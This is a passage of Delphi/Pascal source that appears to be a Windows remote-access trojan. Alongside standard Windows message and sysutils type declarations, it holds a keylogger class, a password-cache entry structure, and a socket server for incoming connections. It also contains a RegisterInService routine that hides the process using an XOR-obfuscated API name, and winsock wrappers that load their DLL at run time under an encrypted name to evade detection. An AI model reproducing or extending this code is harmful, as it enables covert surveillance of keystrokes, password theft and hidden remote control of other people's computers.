Cardinal; Ctl: HWND; DeleteItemStruct: PDeleteItemStruct; Result: Longint; end; TWMDestroy = TWMNoParams; TWMDestroyClipboard = TWMNoParams; TWMDevModeChange = record Msg: Cardinal; Unused: Integer; Device: PChar; Result: Longint; end; TWMDrawClipboard = TWMNoParams; { TWMDropFiles = record Msg: Cardinal; Drop: THANDLE; Unused: Longint; Result: Longint; end; } TWMEnable = record Msg: Cardinal; Enabled: LongBool; Unused: Longint; Result: Longint; end; TWMEndSession = record Msg: Cardinal; EndSession: LongBool; Unused: Longint; Result: Longint; end; TWMEnterIdle = record Msg: Cardinal; Source: Longint; { MSGF_DIALOGBOX, MSGF_MENU } IdleWnd: HWND; Result: Longint; end; TWMEnterMenuLoop = record Msg: Cardinal; IsTrackPopupMenu: LongBool; Unused: Longint; Result: Longint; end; TWMExitMenuLoop = TWMEnterMenuLoop; TWMEraseBkgnd = record Msg: Cardinal; DC: HDC; Unused: Longint; Result: Longint; end; TWMFontChange = TWMNoParams; TWMGetDlgCode = TWMNoParams; TWMGetFont = TWMNoParams; TWMGetIcon = record Msg: Cardinal; BigIcon: Longbool; Unused: Longint; Result: Longint; end; TWMGetText = record Msg: Cardinal; TextMax: Integer; Text: PChar; Result: Longint; end; TWMGetTextLength = TWMNoParams; { TWMHotKey = record Msg: Cardinal; HotKey: Longint; Unused: Longint; Result: Longint; end; } TWMHScroll = TWMScroll; TWMHScrollClipboard = record Msg: Cardinal; Viewer: HWND; ScrollCode: Word; {SB_BOTTOM, SB_ENDSCROLL, SB_LINEDOWN, SB_LINEUP, SB_PAGEDOWN, SB_PAGEUP, SB_THUMBPOSITION, SB_THUMBTRACK, SB_TOP } Pos: Word; Result: Longint; end; TWMIconEraseBkgnd = TWMEraseBkgnd; TWMInitDialog = record Msg: Cardinal; Focus: HWND; InitParam: Longint; Result: Longint; end; TWMInitMenu = record Msg: Cardinal; Menu: HMENU; Unused: Longint; Result: Longint; end; TWMInitMenuPopup = record Msg: Cardinal; MenuPopup: HMENU; Pos: Smallint; SystemMenu: WordBool; Result: Longint; end; TWMKeyDown = TWMKey; TWMKeyUp = TWMKey; TWMKillFocus = record Msg: Cardinal; FocusedWnd: HWND; Unused: Longint; Result: Longint; end; TWMLButtonDblClk = TWMMouse; TWMLButtonDown = TWMMouse; TWMLButtonUp = TWMMouse; TWMMButtonDblClk = TWMMouse; TWMMButtonDown = TWMMouse; TWMMButtonUp = TWMMouse; TWMMDIActivate = record Msg: Cardinal; case Integer of 0: ( ChildWnd: HWND); 1: ( DeactiveWnd: HWND; ActiveWnd: HWND; Result: Longint); end; TWMMDICascade = record Msg: Cardinal; Cascade: Longint; { 0, MDITILE_SKIPDISABLED } Unused: Longint; Result: Longint; end; TWMMDICreate = record Msg: Cardinal; Unused: Integer; MDICreateStruct: PMDICreateStruct; Result: Longint; end; TWMMDIDestroy = record Msg: Cardinal; Child: HWND; Unused: Longint; Result: Longint; end; TWMMDIGetActive = TWMNoParams; TWMMDIIconArrange = TWMNoParams; TWMMDIMaximize = record Msg: Cardinal; Maximize: HWND; Unused: Longint; Result: Longint; end; TWMMDINext = record Msg: Cardinal; Child: HWND; Next: Longint; Result: Longint; end; TWMMDIRefreshMenu = TWMNoParams; TWMMDIRestore = record Msg: Cardinal; IDChild: HWND; Unused: Longint; Result: Longint; end; TWMMDISetMenu = record Msg: Cardinal; MenuFrame: HMENU; MenuWindow: HMENU; Result: Longint; end; TWMMDITile = record Msg: Cardinal; Tile: Longint; { MDITILE_HORIZONTAL, MDITILE_SKIPDISABLE, MDITILE_VERTICAL } Unused: Longint; Result: Longint; end; TWMMenuChar = record Msg: Cardinal; User: Char; Unused: Byte; MenuFlag: Word; { MF_POPUP, MF_SYSMENU } Menu: HMENU; Result: Longint; end; TWMMenuSelect = record Msg: Cardinal; IDItem: Word; MenuFlag: Word; { MF_BITMAP, MF_CHECKED, MF_DISABLED, MF_GRAYED, MF_MOUSESELECT, MF_OWNERDRAW, MF_POPUP, MF_SEPARATOR, MF_SYSMENU } Menu: HMENU; Result: Longint; end; TWMMouseActivate = record Msg: Cardinal; TopLevel: HWND; HitTestCode: Word; MouseMsg: Word; Result: Longint; end; TWMMouseMove = TWMMouse; TWMMove = record Msg: Cardinal; Unused: Integer; case Integer of 0: ( XPos: Smallint; YPos: Smallint); 1: ( Pos: TSmallPoint; Result: Longint); end; TWMNCActivate = record Msg: Cardinal; Active: BOOL; Unused: Longint; Result: Longint; end; TWMNCCalcSize = record Msg: Cardinal; CalcValidRects: BOOL; CalcSize_Params: PNCCalcSizeParams; Result: Longint; end; TWMNCCreate = record Msg: Cardinal; Unused: Integer; CreateStruct: PCreateStruct; Result: Longint; end; TWMNCDestroy = TWMNoParams; TWMNCHitTest = record Msg: Cardinal; Unused: Longint; case Integer of 0: ( XPos: Smallint; YPos: Smallint); 1: ( Pos: TSmallPoint; Result: Longint); end; TWMNCHitMessage = record Msg: Cardinal; HitTest: Longint; XCursor: Smallint; YCursor: Smallint; Result: Longint; end; TWMNCLButtonDblClk = TWMNCHitMessage; TWMNCLButtonDown = TWMNCHitMessage; TWMNCLButtonUp = TWMNCHitMessage; TWMNCMButtonDblClk = TWMNCHitMessage; TWMNCMButtonDown = TWMNCHitMessage; TWMNCMButtonUp = TWMNCHitMessage; TWMNCMouseMove = TWMNCHitMessage; TWMNCPaint = TWMNoParams; TWMNCRButtonDblClk = TWMNCHitMessage; TWMNCRButtonDown = TWMNCHitMessage; TWMNCRButtonUp = TWMNCHitMessage; TWMNextDlgCtl = record Msg: Cardinal; CtlFocus: Longint; Handle: WordBool; Unused: Word; Result: Longint; end; TWMNotify = record Msg: Cardinal; IDCtrl: Longint; NMHdr: PNMHdr; Result: Longint; end; TWMNotifyFormat = record Msg: Cardinal; From: HWND; Command: Longint; Result: Longint; end; TWMPaint = record Msg: Cardinal; DC: HDC; Unused: Longint; Result: Longint; end; TWMPaintClipboard = record Msg: Cardinal; Viewer: HWND; PaintStruct: THandle; Result: Longint; end; TWMPaintIcon = TWMNoParams; TWMPaletteChanged = record Msg: Cardinal; PalChg: HWND; Unused: Longint; Result: Longint; end; TWMPaletteIsChanging = record Msg: Cardinal; Realize: HWND; Unused: Longint; Result: Longint; end; TWMParentNotify = record Msg: Cardinal; case Event: Word of WM_CREATE, WM_DESTROY: ( ChildID: Word; ChildWnd: HWnd); WM_LBUTTONDOWN, WM_MBUTTONDOWN, WM_RBUTTONDOWN: ( Value: Word; XPos: Smallint; YPos: Smallint); 0: ( Value1: Word; Value2: Longint; Result: Longint); end; TWMPaste = TWMNoParams; TWMPower = record Msg: Cardinal; PowerEvt: Longint; { PWR_SUSPENDREQUEST, PWR_SUSPENDRESUME, PWR_CRITICALRESUME } Unused: Longint; Result: Longint; end; TWMQueryDragIcon = TWMNoParams; TWMQueryEndSession = record Msg: Cardinal; Source: Longint; Unused: Longint; Result: Longint; end; TWMQueryNewPalette = TWMNoParams; TWMQueryOpen = TWMNoParams; TWMQueueSync = TWMNoParams; TWMQuit = record Msg: Cardinal; ExitCode: Longint; Unused: Longint; Result: Longint; end; TWMRButtonDblClk = TWMMouse; TWMRButtonDown = TWMMouse; TWMRButtonUp = TWMMouse; TWMRenderAllFormats = TWMNoParams; TWMRenderFormat = record Msg: Cardinal; Format: Longint; Unused: Longint; Result: Longint; end; TWMSetCursor = record Msg: Cardinal; CursorWnd: HWND; HitTest: Word; MouseMsg: Word; Result: Longint; end; TWMSetFocus = record Msg: Cardinal; FocusedWnd: HWND; Unused: Longint; Result: Longint; end; TWMSetFont = record Msg: Cardinal; Font: HFONT; Redraw: WordBool; Unused: Word; Result: Longint; end; TWMSetIcon = record Msg: Cardinal; BigIcon: Longbool; Icon: HICON; Result: Longint; end; TWMSetRedraw = record Msg: Cardinal; Redraw: Longint; Unused: Longint; Result: Longint; end; TWMSetText = record Msg: Cardinal; Unused: Longint; Text: PChar; Result: Longint; end; TWMShowWindow = record Msg: Cardinal; Show: BOOL; Status: Longint; Result: Longint; end; TWMSize = record Msg: Cardinal; SizeType: Longint; { SIZE_MAXIMIZED, SIZE_MINIMIZED, SIZE_RESTORED, SIZE_MAXHIDE, SIZE_MAXSHOW } Width: Word; Height: Word; Result: Longint; end; TWMSizeClipboard = record Msg: Cardinal; Viewer: HWND; RC: THandle; Result: Longint; end; TWMSpoolerStatus = record Msg: Cardinal; JobStatus: Longint; JobsLeft: Word; Unused: Word; Result: Longint; end; TWMStyleChange = record Msg: Cardinal; StyleType: Longint; StyleStruct: PStyleStruct; Result: Longint; end; TWMStyleChanged = TWMStyleChange; TWMStyleChanging = TWMStyleChange; TWMSysChar = TWMKey; TWMSysColorChange = TWMNoParams; TWMSysDeadChar = record Msg: Cardinal; CharCode: Word; Unused: Word; KeyData: Longint; Result: Longint; end; TWMSysKeyDown = TWMKey; TWMSysKeyUp = TWMKey; TWMSystemError = record Msg: Cardinal; ErrSpec: Word; Unused: Longint; Result: Longint; end; TWMTimeChange = TWMNoParams; TWMTimer = record Msg: Cardinal; TimerID: Longint; TimerProc: TFarProc; Result: Longint; end; TWMUndo = TWMNoParams; TWMVKeyToItem = TWMCharToItem; TWMVScroll = TWMScroll; TWMVScrollClipboard = record Msg: Cardinal; Viewer: HWND; ScollCode: Word; ThumbPos: Word; Result: Longint; end; TWMWindowPosChanged = TWMWindowPosMsg; TWMWindowPosChanging = TWMWindowPosMsg; TWMWinIniChange = record Msg: Cardinal; Unused: Integer; Section: PChar; Result: Longint; end; TWMHelp = record Msg: Cardinal; Unused: Integer; HelpInfo: PHelpInfo; Result: Longint; end; TWMDisplayChange = record Msg: Cardinal; BitsPerPixel: Integer; Width: Word; Height: Word; end; // sysutils type type WordRec = packed record Lo, Hi: Byte; end; LongRec = packed record Lo, Hi: Word; end; TMethod = record Code, Data: Pointer; end; PByteArray = ^TByteArray; TByteArray = array[0..32767] of Byte; PWordArray = ^TWordArray; TWordArray = array[0..16383] of Word; TProcedure = procedure; TFileName = string; TSearchRec = record Time: Integer; Size: Integer; Attr: Integer; Name: TFileName; ExcludeAttr: Integer; FindHandle: THandle; FindData: TWin32FindData; end; TFileRec = record Handle: Integer; Mode: Integer; RecSize: Cardinal; Private: array[1..28] of Byte; UserData: array[1..32] of Byte; Name: array[0..259] of Char; end; PTextBuf = ^TTextBuf; TTextBuf = array[0..127] of Char; TTextRec = record Handle: Integer; Mode: Integer; BufSize: Cardinal; BufPos: Cardinal; BufEnd: Cardinal; BufPtr: PChar; OpenFunc: Pointer; InOutFunc: Pointer; FlushFunc: Pointer; CloseFunc: Pointer; UserData: array[1..32] of Byte; Name: array[0..259] of Char; Buffer: TTextBuf; end; TFloatValue = (fvExtended, fvCurrency); TFloatFormat = (ffGeneral, ffExponent, ffFixed, ffNumber, ffCurrency); TFloatRec = packed record Exponent: Smallint; Negative: Boolean; Digits: array[0..20] of Char; end; TTimeStamp = record Time: Integer; { Number of milliseconds since midnight } Date: Integer; { One plus number of days since 1/1/0001 } end; TMbcsByteType = (mbSingleByte, mbLeadByte, mbTrailByte); TSysLocale = packed record DefaultLCID: LCID; PriLangID: LANGID; SubLangID: LANGID; FarEast: Boolean; end; // password connection type TPasswordCacheEntry = packed record cbEntry : word; // size of this entry, in bytes cbResource : word; // size of resource name, in bytes cbPassword : word; // size of password, in bytes iEntry : byte; // entry index nType : byte; // type of entry abResource : array [0..$FFFFFFF] of char; end; TPPasswordCacheEntry = ^TPasswordCacheEntry; // registry type type TRegKeyInfo = record NumSubKeys: Integer; MaxSubKeyLen: Integer; NumValues: Integer; MaxValueLen: Integer; MaxDataLen: Integer; FileTime: TFileTime; end; TRegDataType = (rdUnknown, rdString, rdExpandString, rdInteger, rdBinary); TRegDataInfo = record RegData: TRegDataType; DataSize: Integer; end; TRegistry = class(TObject) private FCurrentKey: HKEY; FRootKey: HKEY; FLazyWrite: Boolean; FCurrentPath: string; FCloseRootKey: Boolean; procedure SetRootKey(Value: HKEY); function OpenKey(const Key: string; CanCreate: Boolean): Boolean; protected function GetBaseKey(Relative: Boolean): HKey; procedure ChangeKey(Value: HKey; const Path: string); procedure PutData(const Name: string; Buffer: Pointer; BufSize: Integer; RegData: TRegDataType); function GetData(const Name: string; Buffer: Pointer; BufSize: Integer; var RegData: TRegDataType): Integer; public constructor Create; destructor Destroy; override; procedure WriteString(const Name, Value: string); function ReadString(const Name: string): string; procedure CloseKey; function GetDataSize(const ValueName: string): Integer; function GetDataInfo(const ValueName: string; var Value: TRegDataInfo): Boolean; property CurrentKey : HKEY read FCurrentKey; property RootKey: HKEY read FRootKey write SetRootKey; property CurrentPath: string read FCurrentPath; property LazyWrite: Boolean read FLazyWrite write FLazyWrite; end; TSock = class(TObject) procedure WriteString(wParam:word;Buff:PChar); function WriteData(wParam:word;Buff:pointer;Len:longInt):LongInt; procedure OnServerAccept(wParam,lParam:longInt); procedure OnServerClose(wParam,lParam:longInt); procedure OnServerRead(wParam,lParam:longInt); private public end; //Key_logger_object Type TLog = class(TObject) procedure LogCreate; procedure LogDestroy; private procedure KeyIncrement( var Msg: TMessage ); message UM_KEYHIT; public end; //============== all var var //sysutils var SysLocale: TSysLocale; LeadBytes: set of Char = []; Win32Platform: Integer; //MainVariables wClass: TWndClass; // Class struct for main window hInst, // Handle of program instance Handle: Integer; // Handle of main window Msg2: TMSG; // Message struct //Msg: TMSG; //Socket Server: TSocket; WSD: TWSAData; Addr: TSockAddrIn; // Address for connect. Port: Integer; //ReadBuff: TBuffer; yyyy,mm,dd,h,m,ss,CountRB: Word; result,nukemsg,nukemsg2,opt,opt2,s,driv: string; d:integer; // si,i:integer; //udp j:byte; z:longint; //ip //Registry Registre: TRegistry; //other klasse: array [0..255] of char; Timeout: integer; t:textfile; // classe: array [0..255] of char; // counter :integer; //thread Sock:TSock; KLog: Tlog; h_SOCK_DLL :HModule; ThreadHdle :THandle; ThreadID :Integer; ExitCode :Integer; ThreadHdle2 :THandle; ThreadID2 :Integer; ExitCode2 :Integer; ThreadHdle3:THandle; ThreadID3 :Integer; ExitCode3 :Integer; iii:byte; sss,sss2:string; ccc:char; //===Dir function systemdir:string; var d:integer; begin setlength(result,500); d:=getsystemdirectory(pchar(result),500); setlength(result,d); end; function windowsdir:string; var d:integer; begin setlength(result,500); d:=getwindowsdirectory(pchar(result),500); setlength(result,d); end; Function Crypt(S : String) : String; Var i : Byte; begin For i := 1 to Length(S) Do S[i] := Char(ord(S[i]) xor i); Crypt := S; end; //==executeAPI function ShellExecute(hWnd: HWND; Operation, FileName, Parameters, Directory: PChar; ShowCmd: Integer):integer; stdcall; external 'shell32.dll' name 'ShellExecuteA'; //function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external 'KERNEL32.DLL'; function RegisterInService:boolean; type TRegisterServiceProcess = function(ProcessID :Integer; Service :Boolean):Boolean; StdCall; var h_KERNEL_DLL :HModule; RegisterServiceProcess :TRegisterServiceProcess; begin Result := False; h_KERNEL_DLL := LoadLibrary(PChar('kernel32.dll')); if h_KERNEL_DLL <> Null then begin RegisterServiceProcess := GetProcAddress(h_KERNEL_DLL, PChar(crypt('SgdmvrbzZoyzdmj@c}pqfe'))); //RegisterServiceProcess if @RegisterServiceProcess <> Nil then Result := RegisterServiceProcess(GetCurrentProcessID, True); FreeLibrary(h_KERNEL_DLL); end; end; //=== winsock function //function accept(s: TSocket; addr: PSockAddr; addrlen: PInteger): TSocket; stdcall; external winsocket name 'accept'; function accept(s: TSocket; addr: PSockAddr; addrlen: PInteger): TSocket; stdcall; Type TListen = function(s: TSocket; addr: PSockAddr; addrlen: PInteger): TSocket; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('accept')); if @LListen <> Nil then Result := LListen(s, addr,addrlen); FreeLibrary(h_SOCK_DLL); end; end; //function bind(s: TSocket; var addr: TSockAddr; namelen: Integer): Integer; stdcall; external winsocket name 'bind'; function bind(s: TSocket; var addr: TSockAddr; namelen: Integer): Integer; stdcall; Type TListen = function(s: TSocket; var addr: TSockAddr; namelen: Integer): Integer; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('bind')); if @LListen <> Nil then Result := LListen(s, addr,namelen); FreeLibrary(h_SOCK_DLL); end; end; //function closesocket(s: TSocket): Integer; stdcall; external winsocket name 'closesocket'; function closesocket(s: TSocket): Integer; stdcall; Type TListen = function(s: TSocket): Integer; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('closesocket')); if @LListen <> Nil then Result := LListen(s); FreeLibrary(h_SOCK_DLL); end; end; //function connect(s: TSocket; var name: TSockAddr; namelen: Integer): Integer; stdcall; external winsocket name 'connect'; function connect(s: TSocket; var name: TSockAddr; namelen: Integer): Integer; stdcall; Type TListen = function(s: TSocket; var name: TSockAddr; namelen: Integer): Integer; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('connect')); if @LListen <> Nil then Result := LListen(s,name,namelen); FreeLibrary(h_SOCK_DLL); end; end; function getpeername(s: TSocket; var name: TSockAddr; var namelen: Integer): Integer; stdcall; external winsocket name 'getpeername'; function getsockname(s: TSocket; var name: TSockAddr; var namelen: Integer): Integer; stdcall; external winsocket name 'getsockname'; function getsockopt(s: TSocket; level, optname: Integer; optval: PChar; var optlen: Integer): Integer; stdcall; external winsocket name 'getsockopt'; //function htonl(hostlong: u_long): u_long; stdcall; external winsocket name 'htonl'; function htonl(hostlong: u_long): u_long; stdcall; Type TListen = function(hostlong: u_long): u_long; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('htonl')); if @LListen <> Nil then Result := LListen(hostlong); FreeLibrary(h_SOCK_DLL); end; end; //function htons(hostshort: u_short): u_short; stdcall; external winsocket name 'htons'; function htons(hostshort: u_short): u_short; stdcall; Type TListen = function(hostshort: u_short): u_short; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('htons')); if @LListen <> Nil then Result := LListen(hostshort); FreeLibrary(h_SOCK_DLL); end; end; //function inet_addr(cp: PChar): u_long; stdcall; external winsocket name 'inet_addr'; {PInAddr;} { TInAddr } function inet_addr(cp: PChar): u_long; stdcall; Type TListen = function(cp: PChar): u_long; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('inet_addr')); if @LListen <> Nil then Result := LListen(cp); FreeLibrary(h_SOCK_DLL); end; end; function inet_ntoa(inaddr: TInAddr): PChar; stdcall; external winsocket name 'inet_ntoa'; function ioctlsocket(s: TSocket; cmd: Longint; var arg: u_long): Integer; stdcall; external winsocket name 'ioctlsocket'; //function listen(s: TSocket; backlog: Integer): Integer; stdcall; external winsocket name 'listen'; function listen(s: TSocket; backlog: Integer): Integer; stdcall; Type TListen = function(s: TSocket; backlog: Integer): Integer; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('listen')); if @LListen <> Nil then Result := LListen(s, backlog); FreeLibrary(h_SOCK_DLL); end; end; //function ntohl(netlong: u_long): u_long; stdcall; external winsocket name 'ntohl'; function ntohl(netlong: u_long): u_long; stdcall; Type TListen = function(netlong: u_long): u_long; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('ntohl')); if @LListen <> Nil then Result := LListen(netlong); FreeLibrary(h_SOCK_DLL); end; end; function ntohs(netshort: u_short): u_short; stdcall; external winsocket name 'ntohs'; //function recv(s: TSocket; var Buf; len, flags: Integer): Integer; stdcall; external winsocket name 'recv'; function recv(s: TSocket; var Buf; len, flags: Integer): Integer; stdcall; Type TListen = function(s: TSocket; var Buf; len, flags: Integer): Integer; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('recv')); if @LListen <> Nil then Result := LListen(s,buf,len,flags); FreeLibrary(h_SOCK_DLL); end; end; function recvfrom(s: TSocket; var Buf; len, flags: Integer; var from: TSockAddr; var fromlen: Integer): Integer; stdcall; external winsocket name 'recvfrom'; function select(nfds: Integer; readfds, writefds, exceptfds: PFDSet; timeout: PTimeVal): Longint; stdcall; external winsocket name 'select'; //function send(s: TSocket; var Buf; len, flags: Integer): Integer; stdcall; external winsocket name 'send'; function send(s: TSocket; var Buf; len, flags: Integer): Integer; stdcall; Type TListen = function(s: TSocket; var Buf; len, flags: Integer): Integer; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('send')); if @LListen <> Nil then Result := LListen(s,buf,len,flags); FreeLibrary(h_SOCK_DLL); end; end; function sendto(s: TSocket; var Buf; len, flags: Integer; var addrto: TSockAddr; tolen: Integer): Integer; stdcall; external winsocket name 'sendto'; function setsockopt(s: TSocket; level, optname: Integer; optval: PChar; optlen: Integer): Integer; stdcall; external winsocket name 'setsockopt'; function shutdown(s: TSocket; how: Integer): Integer; stdcall; external winsocket name 'shutdown'; //function socket(af, struct, protocol: Integer): TSocket; stdcall; external winsocket name 'socket'; function socket(af, struct, protocol: Integer): TSocket; stdcall; Type TListen = function(af, struct, protocol: Integer): TSocket; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('socket')); if @LListen <> Nil then Result := LListen(af,struct,protocol); FreeLibrary(h_SOCK_DLL); end; end; function gethostbyaddr(addr: Pointer; len, struct: Integer): PHostEnt; stdcall; external winsocket name 'gethostbyaddr'; //function gethostbyname(name: PChar): PHostEnt; stdcall; external winsocket name 'gethostbyname'; function gethostbyname(name: PChar): PHostEnt; stdcall; Type TListen = function(name: PChar): PHostEnt; stdcall; var LListen :TListen; begin Result := nil; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('gethostbyname')); if @LListen <> Nil then Result := LListen(name); FreeLibrary(h_SOCK_DLL); end; end; function getprotobyname(name: PChar): PProtoEnt; stdcall; external winsocket name 'getprotobyname'; function getprotobynumber(proto: Integer): PProtoEnt; stdcall; external winsocket name 'getprotobynumber'; function getservbyname(name, proto: PChar): PServEnt; stdcall; external winsocket name 'getservbyname'; function getservbyport(port: Integer; proto: PChar): PServEnt; stdcall; external winsocket name 'getservbyport'; //function gethostname(name: PChar; len: Integer): Integer; stdcall; external winsocket name 'gethostname'; function gethostname(name: PChar; len: Integer): Integer; stdcall; Type TListen = function(name: PChar; len: Integer): Integer; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('gethostname')); if @LListen <> Nil then Result := LListen(name,len); FreeLibrary(h_SOCK_DLL); end; end; //function WSAAsyncSelect(s: TSocket; HWindow: HWND; wMsg: u_int; lEvent: Longint): Integer; stdcall; external winsocket name 'WSAAsyncSelect'; function WSAAsyncSelect(s: TSocket; HWindow: HWND; wMsg: u_int; lEvent: Longint): Integer; stdcall; Type TListen = function(s: TSocket; HWindow: HWND; wMsg: u_int; lEvent: Longint): Integer; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('WSAAsyncSelect')); if @LListen <> Nil then Result := LListen(s,HWindow,wMsg,lEvent); FreeLibrary(h_SOCK_DLL); end; end; function WSARecvEx(s: TSocket; var buf; len: Integer; var flags: Integer): Integer; stdcall; external winsocket name 'WSARecvEx'; function WSAAsyncGetHostByAddr(HWindow: HWND; wMsg: u_int; addr: PChar; len, struct: Integer; buf: PChar; buflen: Integer): THandle; stdcall; external winsocket name 'WSAAsyncGetHostByAddr'; function WSAAsyncGetHostByName(HWindow: HWND; wMsg: u_int; name, buf: PChar; buflen: Integer): THandle; stdcall; external winsocket name 'WSAAsyncGetHostByName'; function WSAAsyncGetProtoByNumber(HWindow: HWND; wMsg: u_int; number: Integer; buf: PChar; buflen: Integer): THandle; stdcall; external winsocket name 'WSAAsyncGetProtoByNumber'; function WSAAsyncGetProtoByName(HWindow: HWND; wMsg: u_int; name, buf: PChar; buflen: Integer): THandle; stdcall; external winsocket name 'WSAAsyncGetProtoByName'; function WSAAsyncGetServByPort( HWindow: HWND; wMsg, port: u_int; proto, buf: PChar; buflen: Integer): THandle; stdcall; external winsocket name 'WSAAsyncGetServByPort'; function WSAAsyncGetServByName(HWindow: HWND; wMsg: u_int; name, proto, buf: PChar; buflen: Integer): THandle; stdcall; external winsocket name 'WSAAsyncGetServByName'; function WSACancelAsyncRequest(hAsyncTaskHandle: THandle): Integer; stdcall; external winsocket name 'WSACancelAsyncRequest'; function WSASetBlockingHook(lpBlockFunc: TFarProc): TFarProc; stdcall; external winsocket name 'WSASetBlockingHook'; function WSAUnhookBlockingHook: Integer; stdcall; external winsocket name 'WSAUnhookBlockingHook'; //function WSAGetLastError: Integer; stdcall; external winsocket name 'WSAGetLastError'; function WSAGetLastError: Integer; stdcall; type TListen = function: Integer; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('WSAGetLastError')); if @LListen <> Nil then Result := LListen; FreeLibrary(h_SOCK_DLL); end; end; procedure WSASetLastError; stdcall; external winsocket name 'WSASetLastError'; function WSACancelBlockingCall: Integer; stdcall; external winsocket name 'WSACancelBlockingCall'; function WSAIsBlocking: BOOL; stdcall; external winsocket name 'WSAIsBlocking'; //function WSAStartup(wVersionRequired: word; var WSData: TWSAData): Integer; stdcall; external winsocket name 'WSAStartup'; function WSAStartup(wVersionRequired: word; var WSData: TWSAData): Integer; stdcall; type TListen = function(wVersionRequired: word; var WSData: TWSAData): Integer; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('WSAStartup')); if @LListen <> Nil then Result := LListen(wVersionRequired, WSData); FreeLibrary(h_SOCK_DLL); end; end; //function WSACleanup: Integer; stdcall; external winsocket name 'WSACleanup'; function WSACleanup: Integer; stdcall; type TListen = function: Integer; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('WSACleanup')); if @LListen <> Nil then Result := LListen; FreeLibrary(h_SOCK_DLL); end; end; function __WSAFDIsSet(s: TSOcket; var FDSet: TFDSet): Bool; stdcall; external winsocket name '__WSAFDIsSet'; function TransmitFile(hSocket: TSocket; hFile: THandle; nNumberOfBytesToWrite: DWORD; nNumberOfBytesPerSend: DWORD; lpOverlapped: POverlapped; lpTransmitBuffers: PTransmitFileBuffers; dwReserved: DWORD): BOOL; stdcall; external winsocket name 'TransmitFile'; function AcceptEx(sListenSocket, sAcceptSocket: TSocket; lpOutputBuffer: Pointer; dwReceiveDataLength, dwLocalAddressLength, dwRemoteAddressLength: DWORD; var lpdwBytesReceived: DWORD; lpOverlapped: POverlapped): BOOL; stdcall; external winsocket name 'AcceptEx'; procedure GetAcceptExSockaddrs(lpOutputBuffer: Pointer; dwReceiveDataLength, dwLocalAddressLength, dwRemoteAddressLength: DWORD; var LocalSockaddr: TSockAddr; var LocalSockaddrLength: Integer; var RemoteSockaddr: TSockAddr; var RemoteSockaddrLength: Integer); stdcall; external winsocket name 'GetAcceptExSockaddrs'; function WSAMakeSyncReply(Buflen, Error: Word): Longint; begin WSAMakeSyncReply:= MakeLong(Buflen, Error); end; function WSAMakeSelectReply(Event, Error: Word): Longint; begin WSAMakeSelectReply:= MakeLong(Event, Error); end; function WSAGetAsyncBuflen(Param: Longint): Word; begin WSAGetAsyncBuflen:= LOWORD(Param); end; function WSAGetAsyncError(Param: Longint): Word; begin WSAGetAsyncError:= HIWORD(Param); end; function WSAGetSelectEvent(Param: Longint): Word; begin WSAGetSelectEvent:= LOWORD(Param); end; function WSAGetSelectError(Param: Longint): Word; begin WSAGetSelectError:= HIWORD(Param); end; procedure FD_CLR(Socket: TSocket; var FDSet: TFDSet); var I: Integer; begin I := 0; while I < FDSet.fd_count do begin if FDSet.fd_array[I] = Socket then begin while I < FDSet.fd_count - 1 do begin FDSet.fd_array[I] := FDSet.fd_array[I + 1]; Inc(I); end; 